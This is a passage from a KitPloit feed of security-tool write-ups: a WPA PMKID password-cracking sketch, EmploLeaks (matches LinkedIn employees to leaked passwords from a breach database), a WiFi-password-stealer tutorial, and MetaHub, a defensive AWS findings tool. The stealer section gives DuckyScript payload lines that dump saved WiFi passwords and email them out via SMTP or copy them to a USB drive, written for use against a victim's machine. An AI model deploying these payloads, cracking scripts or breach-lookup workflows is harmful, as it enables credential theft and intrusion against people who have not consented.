  1. Pairwise Master Key (PMK) Calculation: PMK = PBKDF2(HMAC-SHA1, passphrase, salt=ssid, 4096 iterations, 32 bytes)
  2. PMKID Calculation: PMKID = HMAC-SHA1(PMK, "PMK Name" + bssid + clientmac), truncated to the first 16 bytes

This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
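
For illustration, here is a standard-library Python sketch of both formulas. The function and variable names are mine, not the tool's find_pw_chunk / calculate_pmkid, and the captured values are placeholders:

import hashlib
import hmac

def pmkid_candidate(passphrase, ssid, ap_mac, client_mac):
    # 1. PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID.
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # 2. PMKID: first 16 bytes of HMAC-SHA1(PMK, "PMK Name" | AP MAC | client MAC).
    return hmac.new(pmk, b"PMK Name" + ap_mac + client_mac, hashlib.sha1).digest()[:16]

# Cracking then reduces to comparing candidates against the captured PMKID:
captured = bytes.fromhex("00" * 16)    # placeholder for the PMKID from EAPOL message 1
ap = bytes.fromhex("b8621f50edd9")     # AP MAC, as in the hexstring example above
client = bytes.fromhex("aabbccddeeff") # illustrative client MAC
for word in ["password1", "letmein"]:  # stand-in for a wordlist file
    if pmkid_candidate(word, "MySSID", ap, client) == captured:
        print("found:", word)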

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the steps below; the manual way is shown for understanding.

To obtain the PMKID manually from Wireshark, put your wireless antenna in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture EAPOL message 1 of the handshake. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in Wireshark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
  • In the EAPOL 1 packet, expand the IEEE 802.11 QoS Data field to obtain the AP MAC and client MAC.
  • In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is listed below it.

If the access point is vulnerable, you should see the PMKID value as in the screenshot below:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R β€” January 12th 2024 at 11:30

Β 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.


Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it by running:

cd cli
python3 -m pip install psycopg2-binary

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool πŸ•΅ to chain multiple APIs
emploleaks>

Right now, the tool supports two functionalities:

  • LinkedIn, for searching all employees of a company and getting their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, while the tool is gathering employee profiles, a search against a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. Afterwards, set your authentication tokens and run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run impersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn browser session. You can use the Web Developer Tools to get them: sign in normally at LinkedIn, right-click and choose Inspect, and you will find those cookies in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow where, with the information retrieved from LinkedIn, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case, a custom indexed COMB database) using the connect command, as shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will search the database for leaked credentials affecting any of them:

Finally, the tool will generate console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An important aspect of this project is the use of the indexed COMB database; to build your version, you need to download the torrent first. Be careful: the downloaded files plus the indexed version require at least 400 GB of available disk space.

Once the torrent has been completely downloaded, you will get a folder structure like the following:

β”œβ”€β”€ count_total.sh
β”œβ”€β”€ data
β”‚   β”œβ”€β”€ 0
β”‚   β”œβ”€β”€ 1
β”‚   β”‚   β”œβ”€β”€ 0
β”‚   β”‚   β”œβ”€β”€ 1
β”‚   β”‚   β”œβ”€β”€ 2
β”‚   β”‚   β”œβ”€β”€ 3
β”‚   β”‚   β”œβ”€β”€ 4
β”‚   β”‚   β”œβ”€β”€ 5
β”‚   β”‚   β”œβ”€β”€ 6
β”‚   β”‚   β”œβ”€β”€ 7
β”‚   β”‚   β”œβ”€β”€ 8
β”‚   β”‚   β”œβ”€β”€ 9
β”‚   β”‚   β”œβ”€β”€ a
β”‚   β”‚   β”œβ”€β”€ b
β”‚   β”‚   β”œβ”€β”€ c
β”‚   β”‚   β”œβ”€β”€ d
β”‚   β”‚   β”œβ”€β”€ e
β”‚   β”‚   β”œβ”€β”€ f
β”‚   β”‚   β”œβ”€β”€ g
β”‚   β”‚   β”œβ”€β”€ h
β”‚   β”‚   β”œβ”€β”€ i
β”‚   β”‚   β”œβ”€β”€ j
β”‚   β”‚   β”œβ”€β”€ k
β”‚   β”‚   β”œβ”€β”€ l
β”‚   β”‚   β”œβ”€β”€ m
β”‚   β”‚   β”œβ”€β”€ n
β”‚   β”‚   β”œβ”€β”€ o
β”‚   β”‚   β”œβ”€β”€ p
β”‚   β”‚   β”œβ”€β”€ q
β”‚   β”‚   β”œβ”€β”€ r
β”‚   β”‚   β”œβ”€β”€ s
β”‚   β”‚   β”œβ”€β”€ symbols
β”‚   β”‚   β”œβ”€β”€ t

At this point, you can import all those files with the create_db command:

The importer takes a long time, so we recommend running it with patience.

Next Steps

We are integrating other public sites and applications that may offer information about leaked credentials. We may not be able to see the plaintext password, but it will give an insight into whether the user has any compromised credentials:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information about every employee from public sources. Do you have any idea in mind? Don't hesitate to reach out to us:

You can also DM @pastacls or @gaaabifranco on Twitter.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R β€” January 2nd 2024 at 11:30


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Β 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted with your SMTP details for the Windows exploit, and/or with the Linux password and a USB drive name for the Linux exploit) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have internet access in order to send the stolen data using SMTP for exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of those keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. Delay is especially useful at the very beginning, when a new USB device is connected to a targeted computer: the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions, visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script, you will need to update the script with the correct name of your USB stick, after which you can type the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. The keyfile plugin uses an .ini-style keyfile format to store network configuration profiles; it supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For file filtering, a positive lookbehind assertion ((?<=keyword)) was used. The positive lookbehind assertion matches at a position right after the keyword without making that text part of the match, so the regex (?<=keyword).* matches any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
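
As a quick illustration of that lookbehind (Python's re engine accepts the same pattern as grep -P here; the keyfile content below is made up):

import re

keyfile = "ssid=HomeNet\npsk=SuperSecret123\n"  # made-up keyfile excerpt

# (?<=ssid=) asserts the position right after "ssid=" without consuming it.
print(re.search(r"(?<=ssid=).*", keyfile).group())  # -> HomeNet
print(re.search(r"(?<=psk=).*", keyfile).group())   # -> SuperSecret123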

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, the machine sees it as a USB keyboard only. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

πŸ’‘ Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully, you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy; quite the opposite, it's bulky, especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R β€” December 25th 2023 at 11:30


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs (YOUR context), identifying ownership, and calculating an impact score that you can use to define prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanner (like Prowler).

MetaHub describes your context by connecting to the affected resources in the affected accounts. It can describe information about your AWS account and organization, the affected resource's tags, the related CloudTrail events, the affected resource's configuration, and all its associations: if you are contextualizing a security finding affecting an EC2 instance, MetaHub will not only connect to that instance itself but also to its IAM roles; from there, it will connect to the IAM policies associated with those roles. It will connect to the security groups and analyze all their rules, the VPC and the subnets where the instance is running, the volumes, the Auto Scaling groups, and more.

After fetching all the information from your context, MetaHub evaluates certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations, plus the information from all the security findings affecting the resource taken together, MetaHub generates a score for each finding.

Check the following dashboard generated by MetaHub. It shows the affected resources with all the security findings affecting them grouped together, along with the original severity of each finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account, cloudtrail, and impact.



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS volumes attached to the instance and determine whether they are encrypted. It will also analyze the Auto Scaling groups that the instance is associated with and how. MetaHub will also analyze the VPC, subnets, and other resources associated with the instance.

The Context module can retrieve information from the affected resources, the affected accounts, and every associated resource. It has five main parts: config, associations, tags, cloudtrail, and account. By default, config (which includes associations) and tags are enabled, but you can change this behavior using the option --context (to enable all the context modules, use --context config tags cloudtrail account). The output of each enabled key is added under the affected resource.

Config

Under the config key, you can find anything related to the configuration of the affected resource. For example, if the affected resource is an EC2 instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings, such as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource types support this API. You can check the supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering
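
For example, assuming an Environment tag like the one described above (the tag name and value are illustrative), the following invocation would keep only findings on production-tagged resources:

./metahub --mh-filters-tags Environment=Production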

CloudTrail

Under the key cloudtrail, you will find critical CloudTrail events related to the affected resource, such as creation events.

The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.

For example for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is running, like whether it's part of an AWS Organization, information about its contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates how the affected resource is exposed to other networks. For example, whether the affected resource is public, whether it is part of a VPC, whether it has a public IP, and whether it is protected by a firewall or a security group.

Possible Statuses     Value  Description
effectively-public    100%   The resource is effectively public from the Internet.
restricted-public     40%    The resource is public, but there is a restriction, like a Security Group.
unrestricted-private  30%    The resource is private but unrestricted, like an open security group.
launch-public         10%    These are resources that can launch other resources as public, for example an Auto Scaling group or a Subnet.
restricted            0%     The resource is restricted.
unknown               -      The resource couldn't be checked.

Access

Access evaluates the resource policy layer. MetaHub checks every available policy, including IAM managed policies, IAM inline policies, resource policies, bucket ACLs, and any associations to other resources, like IAM roles, whose policies are also analyzed. An unrestricted policy is not only an issue for that policy itself; it affects any other resource using it.

Possible Statuses        Value  Description
unrestricted             100%   The principal is unrestricted, without any condition or restriction.
untrusted-principal      70%    The principal is an AWS account that is not part of your trusted accounts.
unrestricted-principal   40%    The principal is not restricted, defined with a wildcard. There could be conditions restricting it or other restrictions, like S3 public access blocks.
cross-account-principal  30%    The principal is from another AWS account.
unrestricted-actions     30%    The actions are defined using wildcards.
dangerous-actions        30%    Some dangerous actions are defined as part of this policy.
unrestricted-service     10%    The policy allows an AWS service as principal without restriction.
restricted               0%     The policy is restricted.
unknown                  -      The policy couldn't be checked.

Encryption

Encryption evaluates the different encryption layers based on each resource type. For example, for some resources it evaluates whether the at_rest and in_transit encryption configurations are both enabled.

Possible Statuses  Value  Description
unencrypted        100%   The resource is not fully encrypted.
encrypted          0%     The resource is fully encrypted, including any of its associations.
unknown            -      The resource encryption couldn't be checked.

Status

Status evaluates the status of the affected resource in terms of attachment or functioning. For example, for an EC2 instance we evaluate whether the resource is running, stopped, or terminated; for resources like EBS volumes and security groups, we evaluate whether those resources are attached to any other resource.

Possible Statuses  Value  Description
attached           100%   The resource supports attachment and is attached.
running            100%   The resource supports running and is running.
enabled            100%   The resource supports enabled and is enabled.
not-attached       0%     The resource supports attachment and is not attached.
not-running        0%     The resource supports running and is not running.
not-enabled        0%     The resource supports enabled and is not enabled.
unknown            -      The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account ID, or the account alias. You can define your own environment definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses  Value  Description
production         100%   It is a production resource.
staging            30%    It is a staging resource.
development        0%     It is a development resource.
unknown            -      The resource couldn't be checked for environment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the tag awsApplication, but you can extend this functionality based on your context, for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on the account ID or alias. You can define your application definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses  Value  Description
unknown            -      The resource couldn't be checked for application.

Findings Scoring

As part of the impact score calculation, we also evaluate the total amount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
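
A minimal Python sketch of this metric; the weights for LOW (0.5), HIGH (3) and CRITICAL (4) come from the worked example above, while the INFORMATIONAL and MEDIUM values are assumptions (MetaHub's actual weights live in lib/config/impact.py):

# Severity weights; only LOW, HIGH and CRITICAL are taken from the example.
SEVERITY = {"INFORMATIONAL": 0, "LOW": 0.5, "MEDIUM": 1, "HIGH": 3, "CRITICAL": 4}

def findings_score(severities):
    # Sum of (severity / highest severity), capped at 1.
    highest = SEVERITY["CRITICAL"]
    return min(1.0, sum(SEVERITY[s] / highest for s in severities))

print(findings_score(["HIGH", "LOW"]))  # -> 0.875, matching the example above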

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates their impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Create enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations, for example whether the resource is public, whether it is encrypted, whether it is part of a VPC, or whether it is using a specific IAM role. For more information, refer to Config filters and Tags filters.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, you can enrich your findings back in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update security findings in bulk. MetaHub allows you to execute bulk updates to AWS Security Hub findings, such as changing the Workflow Status, using the option --update-findings. As an example, say you identified hundreds of security findings about public resources, but based on the MetaHub context you know those resources are not effectively public, as they are protected by routing and firewalls. You can update all the findings matching your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different output modes, some of them JSON-based, like json-inventory, json-statistics, json-short, and json-full, but also powerful html, xlsx and csv outputs. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources showing the tags Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and their weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/resources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to the repository dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tagging for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

